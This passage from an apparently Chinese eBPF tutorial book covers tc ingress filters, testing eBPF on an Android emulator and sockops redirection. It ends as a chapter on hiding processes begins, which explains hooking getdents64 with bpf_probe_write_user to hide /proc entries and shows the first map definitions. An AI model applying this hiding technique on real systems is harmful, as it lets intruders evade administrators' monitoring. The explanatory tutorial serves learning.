<p>Linux 的流量控制子系统(Traffic Control, tc)在内核中存在了多年,类似于 iptables 和 netfilter 的关系,tc 也包括一个用户态的 tc 程序和内核态的 traffic control 框架,主要用于从速率、顺序等方面控制数据包的发送和接收。从 Linux 4.1 开始,tc 增加了一些新的挂载点,并支持将 eBPF 程序作为 filter 加载到这些挂载点上。</p>
|
||
<h2 id="tc-概述"><a class="header" href="#tc-概述">tc 概述</a></h2>
|
||
<p>从协议栈上看,tc 位于链路层,其所在位置已经完成了 sk_buff 的分配,要晚于 xdp。为了实现对数据包发送和接收的控制,tc 使用队列结构来临时保存并组织数据包,在 tc 子系统中对应的数据结构和算法控制机制被抽象为 qdisc(Queueing discipline),其对外暴露数据包入队和出队的两个回调接口,并在内部隐藏排队算法实现。在 qdisc 中我们可以基于 filter 和 class 实现复杂的树形结构,其中 filter 被挂载到 qdisc 或 class 上用于实现具体的过滤逻辑,返回值决定了该数据包是否属于特定 class。</p>
|
||
<p>当数据包到达顶层 qdisc 时,其入队接口被调用,其上挂载的 filter 被依次执行直到一个 filter 匹配成功;此后数据包被送入该 filter 指向的 class,进入该 class 配置的 qdisc 处理流程中。tc 框架提供了所谓 classifier-action 机制,即在数据包匹配到特定 filter 时执行该 filter 所挂载的 action 对数据包进行处理,实现了完整的数据包分类和处理机制。</p>
|
||
<p>现有的 tc 为 eBPF 提供了 direct-action 模式,它使得一个作为 filter 加载的 eBPF 程序可以返回像 <code>TC_ACT_OK</code> 等 tc action 的返回值,而不是像传统的 filter 那样仅仅返回一个 classid 并把对数据包的处理交给 action 模块。现在,eBPF 程序可以被挂载到特定的 qdisc 上,并完成对数据包的分类和处理动作。</p>
|
||
<h2 id="编写-ebpf-程序-3"><a class="header" href="#编写-ebpf-程序-3">编写 eBPF 程序</a></h2>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_endian.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
#define TC_ACT_OK 0
|
||
#define ETH_P_IP 0x0800 /* Internet Protocol packet */
|
||
|
||
/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"}
|
||
/// @tcopts {"handle":1, "priority":1}
|
||
SEC("tc")
|
||
int tc_ingress(struct __sk_buff *ctx)
|
||
{
|
||
void *data_end = (void *)(__u64)ctx->data_end;
|
||
void *data = (void *)(__u64)ctx->data;
|
||
struct ethhdr *l2;
|
||
struct iphdr *l3;
|
||
|
||
if (ctx->protocol != bpf_htons(ETH_P_IP))
|
||
return TC_ACT_OK;
|
||
|
||
l2 = data;
|
||
if ((void *)(l2 + 1) > data_end)
|
||
return TC_ACT_OK;
|
||
|
||
l3 = (struct iphdr *)(l2 + 1);
|
||
if ((void *)(l3 + 1) > data_end)
|
||
return TC_ACT_OK;
|
||
|
||
bpf_printk("Got IP packet: tot_len: %d, ttl: %d", bpf_ntohs(l3->tot_len), l3->ttl);
|
||
return TC_ACT_OK;
|
||
}
|
||
|
||
char __license[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这段代码定义了一个 eBPF 程序,它可以通过 Linux TC(Traffic Control)来捕获数据包并进行处理。在这个程序中,我们限定了只捕获 IPv4 协议的数据包,然后通过 bpf_printk 函数打印出数据包的总长度和 Time-To-Live(TTL)字段的值。</p>
|
||
<p>需要注意的是,我们在代码中使用了一些 BPF 库函数,例如 bpf_htons 和 bpf_ntohs 函数,它们用于进行网络字节序和主机字节序之间的转换。此外,我们还使用了一些注释来为 TC 提供附加点和选项信息。例如,在这段代码的开头,我们使用了以下注释:</p>
|
||
<pre><code class="language-c">/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"}
|
||
/// @tcopts {"handle":1, "priority":1}
|
||
</code></pre>
|
||
<p>这些注释告诉 TC 将 eBPF 程序附加到网络接口的 ingress 附加点,并指定了 handle 和 priority 选项的值。关于 libbpf 中 tc 相关的 API 可以参考 <a href="https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/">patchwork</a> 中的介绍。</p>
|
||
<p>总之,这段代码实现了一个简单的 eBPF 程序,用于捕获数据包并打印出它们的信息。</p>
|
||
<h2 id="编译运行-7"><a class="header" href="#编译运行-7">编译运行</a></h2>
|
||
<p>通过容器编译:</p>
|
||
<pre><code class="language-console">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或是通过 <code>ecc</code> 编译:</p>
|
||
<pre><code class="language-console">$ ecc tc.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>并通过 <code>ecli</code> 运行:</p>
|
||
<pre><code class="language-shell">sudo ecli run ./package.json
|
||
</code></pre>
|
||
<p>可以通过如下方式查看程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
node-1254811 [007] ..s1 8737831.671074: 0: Got IP packet: tot_len: 79, ttl: 64
|
||
sshd-1254728 [006] ..s1 8737831.674334: 0: Got IP packet: tot_len: 79, ttl: 64
|
||
sshd-1254728 [006] ..s1 8737831.674349: 0: Got IP packet: tot_len: 72, ttl: 64
|
||
node-1254811 [007] ..s1 8737831.674550: 0: Got IP packet: tot_len: 71, ttl: 64
|
||
</code></pre>
|
||
<h2 id="总结-17"><a class="header" href="#总结-17">总结</a></h2>
|
||
<p>本文介绍了如何向 TC 流量控制子系统挂载 eBPF 类型的 filter 来实现对链路层数据包的排队处理。基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 tc BPF 程序以指定选项挂载到目标网络设备,并借助内核的 sk_buff 结构对数据包进行过滤处理。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<h2 id="参考-1"><a class="header" href="#参考-1">参考</a></h2>
|
||
<ul>
|
||
<li><a href="http://just4coding.com/2022/08/05/tc/">http://just4coding.com/2022/08/05/tc/</a></li>
|
||
<li><a href="https://arthurchiao.art/blog/understanding-tc-da-mode-zh/">https://arthurchiao.art/blog/understanding-tc-da-mode-zh/</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="在-andorid-上使用-ebpf-程序"><a class="header" href="#在-andorid-上使用-ebpf-程序">在 Android 上使用 eBPF 程序</a></h1>
|
||
<blockquote>
|
||
<p>本文主要记录了笔者在 Android Studio Emulator 中测试高版本 Android Kernel 对基于 libbpf 的 CO-RE 技术支持程度的探索过程、结果和遇到的问题。
|
||
测试采用的方式是在 Android Shell 环境下构建 Debian 环境,并基于此尝试构建 eunomia-bpf 工具链、运行其测试用例。</p>
|
||
</blockquote>
|
||
<h2 id="背景-4"><a class="header" href="#背景-4">背景</a></h2>
|
||
<p>截至目前(2023-04),Android 还未对 eBPF 程序的动态加载做出较好的支持,无论是以 bcc 为代表的带编译器分发方案,还是基于 btf 和 libbpf 的 CO-RE 方案,都在较大程度上离不开 Linux 环境的支持,无法在 Android 系统上很好地运行<sup class="footnote-reference"><a href="#WeiShu">1</a></sup>。</p>
|
||
<p>虽然如此,在 Android 平台上尝试 eBPF 也已经有了一些成功案例,除谷歌官方提供的修改 <code>Android.bp</code> 以将 eBPF 程序随整个系统一同构建并挂载的方案<sup class="footnote-reference"><a href="#Google">2</a></sup>,也有人提出基于 Android 内核构建 Linux 环境进而运行 eBPF 工具链的思路,并开发了相关工具。</p>
|
||
<p>目前已有的资料,大多基于 adeb/eadb 在 Android 内核基础上构建 Linux 沙箱,并对 bcc 和 bpftrace 相关工具链进行测试,而对 CO-RE 方案的测试工作较少。在 Android 上使用 bcc 工具目前有较多参考资料,如:</p>
|
||
<ul>
|
||
<li>SeeFlowerX:<a href="https://blog.seeflower.dev/category/eBPF/">https://blog.seeflower.dev/category/eBPF/</a></li>
|
||
<li>evilpan:<a href="https://bbs.kanxue.com/thread-271043.htm">https://bbs.kanxue.com/thread-271043.htm</a></li>
|
||
</ul>
|
||
<p>其主要思路是利用 chroot 在 Android 内核上运行一个 Debian 镜像,并在其中构建整个 bcc 工具链,从而使用 eBPF 工具。如果想要使用 bpftrace,原理也是类似的。</p>
|
||
<p>事实上,高版本的 Android 内核已支持 btf 选项,这意味着 eBPF 领域中新兴的 CO-RE 技术也应当能够运用到基于 Android 内核的 Linux 系统中。本文将基于此对 eunomia-bpf 在模拟器环境下进行测试运行。</p>
|
||
<blockquote>
|
||
<p><a href="https://github.com/eunomia-bpf/eunomia-bpf">eunomia-bpf</a> 是一个结合了 libbpf 和 WebAssembly 技术的开源项目,旨在简化 eBPF 程序的编写、编译和部署。该项目可被视作 CO-RE 的一种实践方式,其核心依赖是 libbpf,相信对 eunomia-bpf 的测试工作能够为其他 CO-RE 方案提供参考。</p>
|
||
</blockquote>
|
||
<h2 id="测试环境"><a class="header" href="#测试环境">测试环境</a></h2>
|
||
<ul>
|
||
<li>Android Emulator(Android Studio Flamingo | 2022.2.1)</li>
|
||
<li>AVD: Pixel 6</li>
|
||
<li>Android Image: Tiramisu Android 13.0 x86_64(5.15.41-android13-8-00055-g4f5025129fe8-ab8949913)</li>
|
||
</ul>
|
||
<h2 id="环境搭建3"><a class="header" href="#环境搭建3">环境搭建<sup class="footnote-reference"><a href="#SeeFlowerX">3</a></sup></a></h2>
|
||
<ol>
|
||
<li>从 <a href="https://github.com/tiann/eadb">eadb 仓库</a> 的 releases 页面获取 <code>debianfs-amd64-full.tar.gz</code> 作为 Linux 环境的 rootfs,同时还需要获取该项目的 <code>assets</code> 目录来构建环境;</li>
|
||
<li>从 Android Studio 的 Device Manager 配置并启动 Android Virtual Device;</li>
|
||
<li>通过 Android Studio SDK 的 adb 工具将 <code>debianfs-amd64-full.tar.gz</code> 和 <code>assets</code> 目录推送到 AVD 中:
|
||
<ul>
|
||
<li><code>./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz</code></li>
|
||
<li><code>./adb push assets /data/local/tmp/assets</code></li>
|
||
</ul>
|
||
</li>
|
||
<li>通过 adb 进入 Android shell 环境并获取 root 权限:
|
||
<ul>
|
||
<li><code>./adb shell</code></li>
|
||
<li><code>su</code></li>
|
||
</ul>
|
||
</li>
|
||
<li>在 Android shell 中构建并进入 debian 环境:
|
||
<ul>
|
||
<li><code>mkdir -p /data/eadb</code></li>
|
||
<li><code>mv /data/local/tmp/assets/* /data/eadb</code></li>
|
||
<li><code>mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz</code></li>
|
||
<li><code>rm -r /data/local/tmp/assets</code></li>
|
||
<li><code>chmod +x /data/eadb/device-*</code></li>
|
||
<li><code>/data/eadb/device-unpack</code></li>
|
||
<li><code>/data/eadb/run /data/eadb/debian</code></li>
|
||
</ul>
|
||
</li>
|
||
</ol>
|
||
<p>至此,测试 eBPF 所需的 Linux 环境已经构建完毕。此外,在 Android shell 中(未进入 debian 时)可以通过 <code>zcat /proc/config.gz</code> 并配合 <code>grep</code> 查看内核编译选项。</p>
|
||
<blockquote>
|
||
<p>目前,eadb 打包的 debian 环境存在 libc 版本低,缺少的工具依赖较多等情况;并且由于内核编译选项不同,一些 eBPF 功能可能也无法使用。</p>
|
||
</blockquote>
|
||
<h2 id="工具构建"><a class="header" href="#工具构建">工具构建</a></h2>
|
||
<p>在 debian 环境中将 eunomia-bpf 仓库 clone 到本地,具体的构建过程,可以参考仓库的 <a href="https://github.com/eunomia-bpf/eunomia-bpf/blob/master/documents/build.md">build.md</a>。在本次测试中,笔者选用了 <code>ecc</code> 编译生成 <code>package.json</code> 的方式,该工具的构建和使用方式请参考<a href="https://github.com/eunomia-bpf/eunomia-bpf/tree/master/compiler">仓库页面</a>。</p>
|
||
<blockquote>
|
||
<p>在构建过程中,可能需要自行安装包括但不限于 <code>curl</code>,<code>pkg-config</code>,<code>libssl-dev</code> 等工具。</p>
|
||
</blockquote>
|
||
<h2 id="结果"><a class="header" href="#结果">结果</a></h2>
|
||
<p>有部分 eBPF 程序可以成功在 Android 上运行,但也会有部分应用因为种种原因无法成功被执行。</p>
|
||
<h3 id="成功案例"><a class="header" href="#成功案例">成功案例</a></h3>
|
||
<h4 id="bootstrap-1"><a class="header" href="#bootstrap-1"><a href="https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/bootstrap">bootstrap</a></a></h4>
|
||
<p>运行输出如下:</p>
|
||
<pre><code class="language-console">TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT
|
||
09:09:19 10217 479 0 0 sh /system/bin/sh 0
|
||
09:09:19 10217 479 0 0 ps /system/bin/ps 0
|
||
09:09:19 10217 479 0 54352100 ps 1
|
||
09:09:21 10219 479 0 0 sh /system/bin/sh 0
|
||
09:09:21 10219 479 0 0 ps /system/bin/ps 0
|
||
09:09:21 10219 479 0 44260900 ps 1
|
||
</code></pre>
|
||
<h4 id="tcpstates"><a class="header" href="#tcpstates"><a href="https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/tcpstates">tcpstates</a></a></h4>
|
||
<p>开始监测后在 Linux 环境中通过 <code>wget</code> 下载 Web 页面:</p>
|
||
<pre><code class="language-console">TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK
|
||
09:07:46 0x4007000200005000000000000f02000a 0x5000000000000f02000a8bc53f77 18446635827774444352 3315344998 0 10115 7 2 2 0 80 wget
|
||
09:07:46 0x40020002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315465870 120872 0 2 1 2 55694 80 swapper/0
|
||
09:07:46 0x40010002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315668799 202929 10115 1 4 2 55694 80 wget
|
||
09:07:46 0x40040002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315670037 1237 0 4 5 2 55694 80 swapper/0
|
||
09:07:46 0x40050002000050003d99f8090f02000a 0x50003d99f8090f02000a8bc53f77 18446635827774444352 3315670225 188 0 5 7 2 55694 80 swapper/0
|
||
09:07:47 0x400200020000bb01565811650f02000a 0xbb01565811650f02000a6aa0d9ac 18446635828348806592 3316433261 0 2546 2 7 2 49970 443 ChromiumNet
|
||
09:07:47 0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet
|
||
</code></pre>
|
||
<p>开始监测后在 Android Studio 模拟界面打开 Chrome 浏览器并访问百度页面:</p>
|
||
<pre><code class="language-console">TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK
|
||
07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020066638144 192874641 0 3305 7 2 2 0 443 NetworkService
|
||
07:46:58 0x40020002d28abb01494b6ebe0f02000a 0xd28abb01494b6ebe0f02000aeb6f2270 18446631020066638144 192921938 47297 3305 2 1 2 53898 443 NetworkService
|
||
07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132433920 193111426 0 3305 7 2 2 0 443 NetworkService
|
||
07:46:58 0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService
|
||
07:46:58 0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService
|
||
07:46:58 0x40040002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService
|
||
07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService
|
||
07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg
|
||
07:46:59 0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService
|
||
07:46:59 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService
|
||
07:46:59 0x40020002d28ebb0182dd92990f02000a 0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0
|
||
07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000a26f6e878 18446631020132433920 195193350 0 3305 7 2 2 0 443 NetworkService
|
||
07:47:00 0x40020002ba32bb01e0e09e3a0f02000a 0xba32bb01e0e09e3a0f02000a26f6e878 18446631020132433920 195206992 13642 0 2 1 2 47666 443 swapper/0
|
||
07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132448128 195233125 0 3305 7 2 2 0 443 NetworkService
|
||
07:47:00 0x40020002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195246569 13444 3305 2 1 2 46248 443 NetworkService
|
||
07:47:00 0xf02000affff00000000000000000000 0x1aca06cffff00000000000000000000 18446631019225912320 195383897 0 947 7 2 10 0 80 Thread-11
|
||
07:47:00 0x40010002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195421584 175014 3305 1 4 2 46248 443 NetworkService
|
||
07:47:00 0x40040002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422361 777 3305 4 5 2 46248 443 NetworkService
|
||
07:47:00 0x400500020000bb0136cac8dd0f02000a 0xbb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422450 88 3305 5 7 2 46248 443 NetworkService
|
||
07:47:01 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet
|
||
</code></pre>
|
||
<h3 id="一些可能的报错原因"><a class="header" href="#一些可能的报错原因">一些可能的报错原因</a></h3>
|
||
<h4 id="opensnoop"><a class="header" href="#opensnoop"><a href="https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/opensnoop">opensnoop</a></a></h4>
|
||
<p>例如 opensnoop 工具,可以在 Android 上成功构建,但运行报错:</p>
|
||
<pre><code class="language-console">libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory
|
||
libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to create tracepoint 'syscalls/sys_enter_open' perf event: No such file or directory
|
||
libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to auto-attach: -2
|
||
failed to attach skeleton
|
||
Error: BpfError("load and attach ebpf program failed")
|
||
</code></pre>
|
||
<p>后经查看发现内核未开启 <code>CONFIG_FTRACE_SYSCALLS</code> 选项,导致无法使用 syscalls 的 tracepoint。</p>
|
||
<h2 id="总结-18"><a class="header" href="#总结-18">总结</a></h2>
|
||
<p>在 Android shell 中查看内核编译选项可以发现 <code>CONFIG_DEBUG_INFO_BTF</code> 默认是打开的,在此基础上 eunomia-bpf 项目提供的 example 已有一些能够成功运行的案例,例如可以监测 <code>exec</code> 族函数的执行和 tcp 连接的状态。</p>
|
||
<p>对于无法运行的一些,原因主要是以下两个方面:</p>
|
||
<ol>
|
||
<li>内核编译选项未支持相关 eBPF 功能;</li>
|
||
<li>eadb 打包的 Linux 环境较弱,缺乏必需的依赖;</li>
|
||
</ol>
|
||
<p>目前在 Android 系统中使用 eBPF 工具基本上仍然需要构建完整的 Linux 运行环境,但 Android 内核本身对 eBPF 的支持已较为全面,本次测试证明较高版本的 Android 内核支持 BTF 调试信息和依赖 CO-RE 的 eBPF 程序的运行。</p>
|
||
<p>Android 系统 eBPF 工具的发展需要官方新特性的加入,目前看来通过 Android APP 直接使用 eBPF 工具需要的工作量较大,同时由于 eBPF 工具需要 root 权限,普通 Android 用户的使用会面临较多困难。</p>
|
||
<p>如果希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<h2 id="参考-2"><a class="header" href="#参考-2">参考</a></h2>
|
||
<div class="footnote-definition" id="Google"><sup class="footnote-definition-label">2</sup>
|
||
<p><a href="https://source.android.google.cn/docs/core/architecture/kernel/bpf">https://source.android.google.cn/docs/core/architecture/kernel/bpf</a></p></div>
|
||
<div class="footnote-definition" id="WeiShu"><sup class="footnote-definition-label">1</sup><p><a href="https://mp.weixin.qq.com/s/mul4n5D3nXThjxuHV7GpMA">https://mp.weixin.qq.com/s/mul4n5D3nXThjxuHV7GpMA</a></p></div>
|
||
<div class="footnote-definition" id="SeeFlowerX"><sup class="footnote-definition-label">3</sup><p><a href="https://blog.seeflower.dev/archives/138/">https://blog.seeflower.dev/archives/138/</a></p>
|
||
</div>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="http"><a class="header" href="#http">http</a></h1>
|
||
<p>TODO</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-sockops-示例"><a class="header" href="#ebpf-sockops-示例">eBPF sockops 示例</a></h1>
|
||
<h2 id="利用-ebpf-的-sockops-进行性能优化"><a class="header" href="#利用-ebpf-的-sockops-进行性能优化">利用 eBPF 的 sockops 进行性能优化</a></h2>
|
||
<p>网络连接本质上是 socket 之间的通讯,eBPF 提供了一个 <a href="https://man7.org/linux/man-pages/man7/bpf-helpers.7.html">bpf_msg_redirect_hash</a> 函数,用来将应用发出的包直接转发到对端的 socket,可以极大地加速包在内核中的处理流程。</p>
|
||
<p>这里 sock_map 是记录 socket 规则的关键部分,即根据当前的数据包信息,从 sock_map 中挑选一个存在的 socket 连接来转发请求。所以需要先在 sockops 的 hook 处或者其它地方,将 socket 信息保存到 sock_map,并提供一个规则 (一般为四元组) 根据 key 查找到 socket。</p>
|
||
<p>Merbridge 项目就是这样实现了用 eBPF 代替 iptables 为 Istio 进行加速。在使用 Merbridge (eBPF) 优化之后,出入口流量会直接跳过很多内核模块,明显提高性能,如下图所示:</p>
|
||
<p><img src="29-sockops/merbridge.png" alt="merbridge" /></p>
|
||
<h2 id="运行样例"><a class="header" href="#运行样例">运行样例</a></h2>
|
||
<p>此示例程序从发送者的套接字(出口)重定向流量至接收者的套接字(入口),<strong>跳过 TCP/IP 内核网络栈</strong>。在这个示例中,我们假定发送者和接收者都在<strong>同一台</strong>机器上运行。</p>
|
||
<h3 id="编译-ebpf-程序"><a class="header" href="#编译-ebpf-程序">编译 eBPF 程序</a></h3>
|
||
<pre><code class="language-shell"># Compile the bpf_sockops program
|
||
clang -O2 -g -Wall -target bpf -c bpf_sockops.c -o bpf_sockops.o
|
||
clang -O2 -g -Wall -target bpf -c bpf_redir.c -o bpf_redir.o
|
||
</code></pre>
|
||
<h3 id="加载-ebpf-程序"><a class="header" href="#加载-ebpf-程序">加载 eBPF 程序</a></h3>
|
||
<pre><code class="language-shell">sudo ./load.sh
|
||
</code></pre>
|
||
<p>您可以使用 <a href="https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst">bpftool utility</a> 检查这两个 eBPF 程序是否已经加载。</p>
|
||
<pre><code class="language-console">$ sudo bpftool prog show
|
||
63: sock_ops name bpf_sockmap tag 275467be1d69253d gpl
|
||
loaded_at 2019-01-24T13:07:17+0200 uid 0
|
||
xlated 1232B jited 750B memlock 4096B map_ids 58
|
||
64: sk_msg name bpf_redir tag bc78074aa9dd96f4 gpl
|
||
loaded_at 2019-01-24T13:07:17+0200 uid 0
|
||
xlated 304B jited 233B memlock 4096B map_ids 58
|
||
</code></pre>
|
||
<h3 id="运行-iperf3-服务器"><a class="header" href="#运行-iperf3-服务器">运行 <a href="https://iperf.fr/">iperf3</a> 服务器</a></h3>
|
||
<pre><code class="language-shell">iperf3 -s -p 10000
|
||
</code></pre>
|
||
<h3 id="运行-iperf3-客户端"><a class="header" href="#运行-iperf3-客户端">运行 <a href="https://iperf.fr/">iperf3</a> 客户端</a></h3>
|
||
<pre><code class="language-shell">iperf3 -c 127.0.0.1 -t 10 -l 64k -p 10000
|
||
</code></pre>
|
||
<h3 id="收集追踪"><a class="header" href="#收集追踪">收集追踪</a></h3>
|
||
<pre><code class="language-console">$ ./trace.sh
|
||
iperf3-9516 [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135
|
||
iperf3-9516 [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583
|
||
iperf3-9516 [001] .... 22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135
|
||
iperf3-9516 [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095
|
||
</code></pre>
|
||
<p>你应该可以看到 4 个用于套接字建立的事件。如果你没有看到任何事件,那么 eBPF 程序可能没有正确地附加上。</p>
|
||
<h3 id="卸载-ebpf-程序"><a class="header" href="#卸载-ebpf-程序">卸载 eBPF 程序</a></h3>
|
||
<pre><code class="language-shell">sudo ./unload.sh
|
||
</code></pre>
|
||
<h2 id="参考资料-1"><a class="header" href="#参考资料-1">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/zachidan/ebpf-sockops">https://github.com/zachidan/ebpf-sockops</a></li>
|
||
<li><a href="https://github.com/merbridge/merbridge">https://github.com/merbridge/merbridge</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-开发实践使用-ebpf-隐藏进程或文件信息"><a class="header" href="#ebpf-开发实践使用-ebpf-隐藏进程或文件信息">eBPF 开发实践:使用 eBPF 隐藏进程或文件信息</a></h1>
|
||
<p>eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。</p>
|
||
<p>在本篇教程中,我们将展示如何利用 eBPF 来隐藏进程或文件信息,这是网络安全和防御领域中一种常见的技术。</p>
|
||
<h2 id="背景知识与实现机制"><a class="header" href="#背景知识与实现机制">背景知识与实现机制</a></h2>
|
||
<p>"进程隐藏" 能让特定的进程对操作系统的常规检测机制变得不可见。在黑客攻击或系统防御的场景中,这种技术都可能被应用。具体来说,Linux 系统中每个进程都在 /proc/ 目录下有一个以其进程 ID 命名的子文件夹,包含了该进程的各种信息。<code>ps</code> 命令就是通过查找这些文件夹来显示进程信息的。因此,如果我们能隐藏某个进程的 /proc/ 文件夹,就能让这个进程对 <code>ps</code> 命令等检测手段“隐身”。</p>
|
||
<p>要实现进程隐藏,关键在于操作 <code>/proc/</code> 目录。在 Linux 中,<code>getdents64</code> 系统调用可以读取目录下的文件信息。我们可以通过挂接这个系统调用,修改它返回的结果,从而达到隐藏文件的目的。实现这个功能需要使用到 eBPF 的 <code>bpf_probe_write_user</code> 功能,它可以修改用户空间的内存,因此能用来修改 <code>getdents64</code> 返回的结果。</p>
|
||
<p>下面,我们会详细介绍如何在内核态和用户态编写 eBPF 程序来实现进程隐藏。</p>
|
||
<h3 id="内核态-ebpf-程序实现-1"><a class="header" href="#内核态-ebpf-程序实现-1">内核态 eBPF 程序实现</a></h3>
|
||
<p>接下来,我们将详细介绍如何在内核态编写 eBPF 程序来实现进程隐藏。首先是 eBPF 程序的起始部分:</p>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: BSD-3-Clause
|
||
#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "common.h"
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
// Ringbuffer Map to pass messages from kernel to user
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_RINGBUF);
|
||
__uint(max_entries, 256 * 1024);
|
||
} rb SEC(".maps");
|
||
|
||
// Map to hold the dents buffer addresses
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, size_t);
|
||
__type(value, long unsigned int);
|
||
} map_buffs SEC(".maps");
|
||
|
||
// Map used to enable searching through the
|
||
// data in a loop
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, size_t);
|
||
__type(value, int);
|
||
} map_bytes_read SEC(".maps");
|
||
|
||
// Map with address of the actual dirent to patch
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, size_t);
|
||
__type(value, long unsigned int);
|
||
} map_to_patch SEC(".maps");
|
||
|
||
// Map to hold program tail calls
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PROG_ARRAY);
|
||
__uint(max_entries, 5);
|
||
__type(key, __u32);
|
||
__type(value, __u32);
|
||
} map_prog_array SEC(".maps");
|
||
</code></pre>
|
||
